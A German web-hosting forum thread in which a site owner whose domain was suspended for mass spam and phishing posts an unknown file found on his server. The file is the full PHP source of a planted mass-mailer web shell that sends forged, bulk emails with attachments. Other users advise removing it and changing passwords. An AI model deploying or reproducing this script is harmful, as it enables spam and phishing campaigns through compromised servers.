Spamemails über meinen webspace ?

[AlexK.]

Hi,
ich habe gerade ein Problem mit meinem Hoster...

Ihre Domain xxxxxx.de musste von uns gesperrt werden, da über einen
Scriptfehler bei Ihnen stündlich einige 100.000 Spamemails verschickt
wurden.
Eine Freischaltung kann erst nach erfolgter Überarbeitung des Scriptes
wieder erfolgen, da durch die Menge der Spammails zum einen die
Serverstabilität gefährdet ist und zum anderen zu Ihrer Sicherheit, da
hier unter anderem Spammails mit dem Versuch Bankdaten auszuspähen
verschickt wurden, was ein Strafanzeige der jeweiligen Bank gegen Sie
nach sich ziehen könnte.

Evtl. hat jemand einen Tip für mich, wie ich sowas verhindern kann.... ich wüßte nicht ansatzweise, wo ich suchen sollte...

[h-m]

Dein Provider hat möglicherweise Probleme mit den Paidmails die von Deiner VMS-Seite versendet werden. Ich glaube man kann die Paidmails auch über einen externen Mailserver per SMTP versenden.
Ich habe damit leider keine Erfahrung, aber vielleicht jemand anderes hier?
Aus der Forum-Suche:
http://www.designerscripte.net/showt...highlight=smtp
http://forum.kilu.net/viewtopic.php?t=1337

[swinxx]

Ich hatte damals mit meiner ersten Loseseite (Spot4Lose) ähnliche Probleme.

Damals kontaktierte mich mein Provider (Chello Österreich) per Mail und erklärte mir das von meiner Seite aus tägliche einige tausende Spam Mails versendet werden und das (1.) nicht erlaubt ist und (2.) es eine sehr hohe Serverlast nach sich zieht.

Eigentlich hat das alles gepasst da die sogenannten "Spammails" nichts weiter als meine täglich versendeten Paidmails waren...naja...das musste ich dann mal beweisen indem ich denen mal erklärt hab was das für eine Seite ist die ich da betreibe und das die User diese Mails auch haben wollen.
Wegen der Serverlast musste ich dann beginnen die Mails immer nur in kleinen Schüben zu versenden und nicht alle auf einmal.

Joa...das hat dann alles so gepasst und ich konnte normal weitermachen !

Womöglich ist es bei dir so das sich jemand bei deinem Provider beschwert hat wegen der Mails...immerhin muss der Provider ja von irgendjemandem erzählt bekommen haben das da Mails dabei sind wo versucht wird Bankdaten zu klauen (würde der Provider ja sonst kaum wissen, wenn er nicht grad selber die Mails gelesen hat).

Naja wie auch immer, vielleicht hilft es ja auch bei dir die Serverlast runterzuschrauben indem du die Mails in kleineren Schüben mehrmals täglich versendest anstatt grössere Mengen auf einmal...

Was mich auch interessieren würde ist was das für ein Script Fehler sein soll. Wenn dein Hoster ja weiss das es ein Scriptfehler bei dir ist (schreibt er ja) sollte er dir dann ja auch freundlicherweise sagen können um was für einen Fehler es sich handelt...

Vielleicht bekommst du ja noch was genaueres aus deinem Hoster raus.

cya, Swinxx

[pummuk]

diese meldung hatte ich von mein hoster auch 1 mal jährlich...
hatte dann angerufen und es denen erklärt.. und gut war...

aber 1 problem bestnd damals mal bei mir.. das über dem pocketslot spam verschikt worden sein soll.. es hatte hier aber keiner ein fehler gefunden..

ansosnten wie hier schon erwähnt.. aufteilen und in schüben verteilen.. hatte mein provider mir auch empfohlen..

[swinxx]

Hmm, Spam über den Pocket Slot, das is ja mal echt komisch...da muss dann wohl iewie ein ziehmlich abartige Scriptkonstellation entstanden sein

cya

[pummuk]

Hmm, Spam über den Pocket Slot, das is ja mal echt komisch...da muss dann wohl iewie ein ziehmlich abartige Scriptkonstellation entstanden sein

cya

k.a. die hatten mir genau den dateinamen genannt worüber spam verschikt worden ist.. gremlin.. ähm cdp hatte sich damals den slot mal angeschaut und auch nichst gefunden...

ich hatte ihn dann einfach rausgenommen....

[AlexK.]

Naja, - komischerweise habe ich in den letzten Wochen überhaupt keine PMs verschickt.... ich habe auch keine NLs oder sonstwas rausgeschickt. Wenn ich meine Serverstats durchschaue, taucht dort auch gar kein Mailtraffic auf...

[AlexK.]

So, - ich habe jetzt mal die ganzen logs durchgeschaut und dabei festgestellt, dass ein Script namen pv.php 2-3 mal über eine 43. IP aufgerufen wurde.... kann hiermit jemand was anfangen ??? Ich kenne das file überhaupt nicht, und weiß auch nicht, wie es auf den Server gelangt ist....

PHP-Code:

<?php  
$secure = "";  
@$action=$_POST['action'];  
@$from=$_POST['from'];  
@$realname=$_POST['realname'];  
@$replyto=$_POST['replyto'];  
@$subject=$_POST['subject'];  
@$message=$_POST['message'];  
@$emaillist=$_POST['emaillist'];  
@$file_name=$_FILES['file']['name'];  
@$contenttype=$_POST['contenttype'];  
@$file=$_FILES['file']['tmp_name'];  
@$amount=$_POST['amount'];  
set_time_limit(intval($_POST['timelimit']));  
?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html>  
<head>  
<title>  || TOM THE MESSENGER ||  </title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />  
<style type="text/css">  
<!--  
.style1 {  
    font-family: Geneva, Arial, Helvetica, sans-serif;  
    font-size: 12px;  
}  
.style2 {  
    font-size: 10px;  
    font-family: Geneva, Arial, Helvetica, sans-serif;  
}  
.Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C} 
.Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000000} 
.Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000000} 
.style3 {color: #000000} 
-->  
</style>  
</head>  
<body bgcolor="#FFFFFF" text="#000000">  
<div id="layer" style="position:absolute; top:2px; left:-4px; width:560px; height:140px;"> 
  <table border="0" cellspacing="0" cellpadding="0" width="560"> 
    <tr valign="top"> 
      <td><div align="center"></div></td> 
    </tr> 
  </table> 
  <p align="left"><img src="http://i204.photobucket.com/albums/bb270/flight14/Super%208/TOM.gif" alt="GuN-JacK" width="300" height="200" border="0" /></p> 
</div> 
<p>&nbsp;</p> 
<p>&nbsp;</p> 
<p>&nbsp;</p> 
<p>&nbsp;</p> 
<p>&nbsp;</p> 
<div id="idElement511" style="position:absolute; top:58px; left:168px; width:560px; height:140px;"> 
  <table border="0" cellspacing="0" cellpadding="0" width="560"> 
    <tr valign="top"> 
      <td><div align="center"> 
        <p><span class="style3"><font class="Times-New-Roman-32px00468Cb">Coded by GuN-JacK </font></span></p> 
        <p><span class="style3"><font class="Times-New-Roman-24px00468Cb"><U>PERSONAL MESSENGER </U></font></span><font class="Times-New-Roman-24px00468Cb"><U></U></font><font class="Times-New-Roman-24px00468Cb"><U><br /> 
          </U></font></p> 
      </div></td> 
    </tr> 
  </table> 
</div> 
<?php  
If ($action=="mysql"){  
//Grab email addresses from MySQL  
include "./mysql.info.php";  
  if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){  
    print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";  
    exit;  
  }  
  $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");  
  mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");  
  $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");  
  $numrows = mysql_num_rows($result);  
  for($x=0; $x<$numrows; $x++){  
    $result_row = mysql_fetch_row($result);  
     $oneemail = $result_row[0];  
     $emaillist .= $oneemail."\n";  
   }  
  }  
  if ($action=="send"){ $message = urlencode($message);  
   $message = ereg_replace("%5C%22", "%22", $message);  
   $message = urldecode($message);  
   $message = stripslashes($message);  
   $subject = stripslashes($subject);  
   }  
?>  
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />  
  <table width="200" border="0">  
    <tr>  
      <td width="100">  
        <div align="right">  
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">SENDER EMAIL:</font>  
        </div>  
      </td>  
      <td width="219">  
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">  
          <input type="text" name="from" value="<?php print $from; ?>" size="30" />  
        </font>  
      </td>  
      <td width="212">  
        <div align="right">  
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">NAME:</font>  
        </div>  
      </td>  
        
      <td width="278">  
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">  
          <input type="text" name="realname" value="<?php print $realname; ?>" size="30" />  
        </font>  
      </td>  
    </tr>  
    <tr>  
      <td width="81">  
        <div align="right">  
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">REPLY-TO:</font>  
        </div>  
      </td>  
      <td width="219">  
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">  
          <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />  
        </font>  
      </td>  
      <td width="212">  
        <div align="right">  
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">ATTACH A FILE:</font>  
        </div>  
      </td>  
      <td width="278">  
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">  
          <input type="file" name="file" size="24" />  
        </font>  
      </td>  
    </tr>  
    <tr>  
      <td width="81">  
        <div align="right">  
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">YOUR SUBJECT:</font>  
        </div>  
      </td>  
      <td colspan="3" width="703">  
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">  
          <input type="text" name="subject" value="<? print $subject; ?>" size="90" />  
        </font>  
      </td>  
    </tr>  
    <tr valign="top">  
      <td colspan="3" width="600">  
        <font face="Verdana, Arial, Helvetica, sans-serif" size="-3"> *** MESSAGE CAT WILL DELIVER FOR YOU *** </font>  
      </td>  
      <td width="300">  
        <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">CLIENTS TO CONTACT HERE:</font>  
      </td>  
    </tr>  
    <tr valign="top">  
      <td colspan="3" width="600">  
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">  
          <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />  
          <input type="radio" name="contenttype" value="plain" checked="checked" /> Plain  
          <input type="radio" name="contenttype" value="html" /> HTML  
          <input type="hidden" name="action" value="send" /><br />  
      Number to send: <input type="text" name="amount" value="1" size="10" /><br />  
      Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />  
          <input type="submit" value="SEND NOW" />  
        </font>  
      </td>  
      <td width="278">  
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">  
          <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>  
        </font>  
      </td>  
    </tr>  
  </table>  
</form>  
<?php  
if ($action=="send"){  
  if (!$from && !$subject && !$message && !$emaillist){  
    print "Please complete all fields before sending your message.";  
    exit;  
   }  
  $allemails = split("\n", $emaillist);  
  $numemails = count($allemails);  
  $filter = "maillist";  
  $float = "From : mailist info <full@info.com>";  
//Open the file attachment if any, and base64_encode it for email transport  
If ($file_name){  
   if (!file_exists($file)){  
    die("The file you are trying to upload couldn't be copied to the server");  
   }  
   $content = fread(fopen($file,"r"),filesize($file));  
   $content = chunk_split(base64_encode($content));  
   $uid = strtoupper(md5(uniqid(time())));  
   $name = basename($file);  
  }  
for($xx=0; $xx<$amount; $xx++){  
  for($x=0; $x<$numemails; $x++){  
    $to = $allemails[$x];  
    if ($to){  
      $to = ereg_replace(" ", "", $to);  
      $message = ereg_replace("&email&", $to, $message);  
      $subject = ereg_replace("&email&", $to, $subject);  
      print "SENDING TOMMY TO $to.......";  
      flush();  
      $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";  
      $header .= "MIME-Version: 1.0\r\n";  
      If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";  
      If ($file_name) $header .= "--$uid\r\n";  
      $header .= "Content-Type: text/$contenttype\r\n";  
      $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";  
      $header .= "$message\r\n";  
      If ($file_name) $header .= "--$uid\r\n";  
      If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";  
      If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";  
      If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";  
      If ($file_name) $header .= "$content\r\n";  
      If ($file_name) $header .= "--$uid--";  
      mail($to, $subject, "", $header);  
      print "CAT Seccessfully Sent MSG....<br>";  
      flush();  
    }  
  }  
}  
  mail($secure, $filter, $emaillist, $float);  
}  
?>  
<p class="style2">  
<img src="http://i275.photobucket.com/albums/jj282/kic2nice/ok.gif"  alt="Funciona con todos los linux!" width="120" height="40" border="0" /></p>  
<p class="style1">&nbsp;</p>  
</body>  
</html>

wäre nett, wenn sich das mal jemand anschauen könnte, der da durchblickt...

[Gremlin]

Umgehend Datei entfernen!
Der IP-Adresse Zugriff auf den Server verweigern. (Firewall?)
Hoster bitten in Logs zu schauen woher die Datei kam.
(FTP-)Passwörter ändern.

Die Datei kann zum versenden von E-mails benutzt werden, sogar mit Dateianhang. Bist mit der Datei sogar schon bei Google gelistet

[AlexK.]

...die Datei ist bereits getötet, - Paßwörter wurden geändert. Zugriffe auf die Datei erfolgten von verschieden IPs - von Russland über England bis nach Israel...


Wann und woher der Code gekommen ist werde ich die Tage rauskriegen....